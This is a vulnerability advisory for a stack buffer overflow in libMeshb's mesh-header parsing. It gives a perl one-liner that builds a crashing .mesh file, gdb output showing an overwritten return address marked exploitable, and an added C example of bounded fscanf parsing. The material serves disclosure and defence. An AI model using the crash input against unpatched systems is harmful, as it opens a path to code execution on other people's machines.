libMeshb Buffer Overflow

libMeshb suffers from a buffer overflow vulnerability. Version 7.62 has been released to address this issue.

SHA-256 | 4eb31ef6c78c0a4496bb470b1fbeb940f7fb6e6336a12f36aa32c13366a7a515


libMeshb is a library which supports moving between data types for the Gamma Mesh Format. A buffer overflow was found in the parsing of the MESH format, and specially crafted .mesh files could allow for arbitrary code execution.


No magic bytes or valid header are necessary, as the bug appears to be an unbounded fscanf() call that processes mesh headers.

echo -ne `perl -e 'print "B" x 2176'` > test.mesh


(gdb) r test.mesh /tmp/empty.mesh
Starting program: mesh2poly test.mesh /tmp/empty.mesh

*** stack smashing detected ***: terminated

Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50

(gdb) bt
#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1 0x00007ffff7ddb859 in __GI_abort () at abort.c:79
#2 0x00007ffff7e463ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7f7007c "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155
#3 0x00007ffff7ee8b4a in __GI___fortify_fail (msg=msg@entry=0x7ffff7f70064 "stack smashing detected") at fortify_fail.c:26
#4 0x00007ffff7ee8b16 in __stack_chk_fail () at stack_chk_fail.c:24
#5 0x000055555555b5d2 in GmfOpenMesh ()
#6 0x4242424242424242 in ?? ()
#7 0x0000000000000000 in ?? ()

(gdb) exploitable
Description: Stack buffer overflow
Short description: StackBufferOverflow (6/22)
Hash: ea307ff89c1110d6e6c6f565bfc6a9ce.350b4f5ab2938b2eb4fa0a598f3508e1
Exploitability Classification: EXPLOITABLE
Explanation: The target stopped while handling a signal that was generated by libc due to detection of a stack buffer overflow. Stack buffer overflows are generally considered exploitable.
Other tags: PossibleStackCorruption (7/22), AbortSignal (20/22)

This also affects the Python wrapper library pymeshb.

>>> import pymeshb
*** stack smashing detected ***: terminated
Aborted (core dumped)
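
The unbounded fscanf() pattern described above, next to a width-limited replacement that rejects overlong tokens instead of truncating them. This is an added example, not libMeshb's code or its 7.62 fix; KW_MAX, read_keyword and check_token_of are assumed names and the input is constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define KW_MAX 255            /* assumed keyword limit, not libMeshb's value */
#define STR_(x) #x
#define STR(x) STR_(x)

enum kw_status { KW_OK = 0, KW_EOF = -1, KW_TOO_LONG = -2 };

/* Unbounded pattern of the kind the advisory describes:
 *     char buf[256]; fscanf(f, "%s", buf);
 * A 2176-byte token with no whitespace is copied far past the end of buf. */

/* Bounded read: "%255s" stores at most KW_MAX bytes plus the NUL.
 * A token that fills the buffer and continues is rejected, not truncated. */
enum kw_status read_keyword(FILE *f, char buf[KW_MAX + 1])
{
    if (fscanf(f, "%" STR(KW_MAX) "s", buf) != 1)
        return KW_EOF;                 /* no token, or read error */
    if (strlen(buf) < KW_MAX)
        return KW_OK;
    int c = fgetc(f);                  /* buffer is full: peek at what follows */
    if (c == EOF || isspace(c))
        return KW_OK;                  /* token was exactly KW_MAX bytes */
    ungetc(c, f);
    return KW_TOO_LONG;
}

/* Constructed input: n 'B' bytes in a temp file (the advisory's file has 2176).
 * Returns KW_EOF if the temp file cannot be created. */
enum kw_status check_token_of(size_t n)
{
    char buf[KW_MAX + 1];
    FILE *f = tmpfile();
    if (!f) return KW_EOF;
    for (size_t i = 0; i < n; i++) fputc('B', f);
    rewind(f);
    enum kw_status st = read_keyword(f, buf);
    fclose(f);
    return st;
}

int main(void) {
    printf("2176 bytes -> %d, 12 bytes -> %d\n", check_token_of(2176), check_token_of(12));
    return 0;
}
```
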


libMeshb v7.62


